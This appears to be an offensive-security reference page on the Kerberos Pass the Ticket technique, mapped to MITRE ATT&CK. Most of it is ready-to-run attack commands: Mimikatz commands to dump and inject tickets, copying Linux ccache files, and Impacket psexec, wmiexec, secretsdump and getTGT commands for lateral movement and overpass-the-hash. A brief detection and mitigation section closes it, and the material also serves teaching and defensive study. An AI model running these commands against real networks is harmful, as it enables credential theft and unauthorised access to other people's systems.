Pass the Ticket
Overview
Pass the Ticket (PtT) uses stolen Kerberos tickets (TGT or TGS) to authenticate to services without knowing the user's password or hash. Unlike Pass the Hash which uses NTLM, PtT works with Kerberos authentication — this is important in environments where NTLM is disabled. Tickets can be extracted from memory, exported from keytabs, or forged (Golden/Silver tickets).
ATT&CK Mapping
- Tactic: TA0008 - Lateral Movement
- Technique: T1550.003 - Use Alternate Authentication Material: Pass the Ticket
Prerequisites
- A valid Kerberos ticket (TGT or TGS) in
.kirbior.ccacheformat - Network access to the target service
- The ticket must not be expired
Techniques
Extract Tickets from Memory (Windows)
# Mimikatz
# https://github.com/gentilkiwi/mimikatz
# List all Kerberos tickets in memory
mimikatz# sekurlsa::tickets
# Export all tickets to .kirbi files
mimikatz# sekurlsa::tickets /export
# List tickets in current session
mimikatz# kerberos::list /export
Extract Tickets from Memory (Linux)
# Tickets stored in ccache files
# Default location: /tmp/krb5cc_<uid>
ls -la /tmp/krb5cc_*
# Copy the ccache file
cp /tmp/krb5cc_1000 /tmp/stolen.ccache
Inject Ticket (Windows — Mimikatz)
# Mimikatz
# https://github.com/gentilkiwi/mimikatz
# Purge existing tickets
mimikatz# kerberos::purge
# Inject a .kirbi ticket
mimikatz# kerberos::ptt <ticket.kirbi>
# Verify the injected ticket
mimikatz# kerberos::list
After injection, use standard Windows tools (e.g., dir \\dc\c$, PsExec) — they will use the injected ticket.
Use Ticket (Linux — Impacket)
# Set the KRB5CCNAME environment variable to the ccache file
export KRB5CCNAME=/path/to/ticket.ccache
# Impacket — use ticket for PsExec
# https://github.com/fortra/impacket
impacket-psexec '<domain>/<user>@<target>' -k -no-pass
# Impacket — use ticket for WMIExec
impacket-wmiexec '<domain>/<user>@<target>' -k -no-pass
# Impacket — use ticket for secretsdump
impacket-secretsdump '<domain>/<user>@<target>' -k -no-pass
The -k flag tells Impacket to use Kerberos authentication. The -no-pass flag skips password prompts since the ticket provides authentication.
Convert Ticket Formats
# Impacket — convert .kirbi (Windows) to .ccache (Linux)
# https://github.com/fortra/impacket
impacket-ticketConverter ticket.kirbi ticket.ccache
# Convert .ccache to .kirbi
impacket-ticketConverter ticket.ccache ticket.kirbi
Request TGT with Known Credentials
# Impacket — request TGT with password
# https://github.com/fortra/impacket
impacket-getTGT '<domain>/<user>:<password>' -dc-ip <dc_ip>
# Request TGT with NTLM hash
impacket-getTGT '<domain>/<user>' -hashes ':<ntlm_hash>' -dc-ip <dc_ip>
# Request TGT with AES key
impacket-getTGT '<domain>/<user>' -aesKey <aes256_key> -dc-ip <dc_ip>
This creates a .ccache file that can be used with KRB5CCNAME.
Overpass the Hash (NTLM → Kerberos)
Convert an NTLM hash into a Kerberos TGT:
# Impacket — request TGT using NTLM hash
# https://github.com/fortra/impacket
impacket-getTGT '<domain>/<user>' -hashes ':<ntlm_hash>' -dc-ip <dc_ip>
export KRB5CCNAME=<user>.ccache
# Now use Kerberos-based tools
impacket-psexec '<domain>/<user>@<target>' -k -no-pass
# Mimikatz — Overpass the Hash
# https://github.com/gentilkiwi/mimikatz
mimikatz# sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlm_hash> /run:powershell
Detection Methods
Network-Based Detection
- Kerberos ticket requests from unusual source hosts
- TGS requests from hosts that did not previously request a TGT
Host-Based Detection
- Windows Security Event 4768 (TGT request) from unexpected accounts
- Windows Security Event 4769 (TGS request) for services the account doesn't normally access
- Mimikatz execution artifacts in process memory
Mitigation Strategies
- Credential Guard — protects TGTs and NTLM hashes in LSASS (does not protect TGS service tickets)
- Short ticket lifetimes — reduce the window for stolen tickets
- Protected Users group — enforces Kerberos constraints, prevents delegation
- Monitor for anomalous Kerberos usage — alert on tickets used from unusual hosts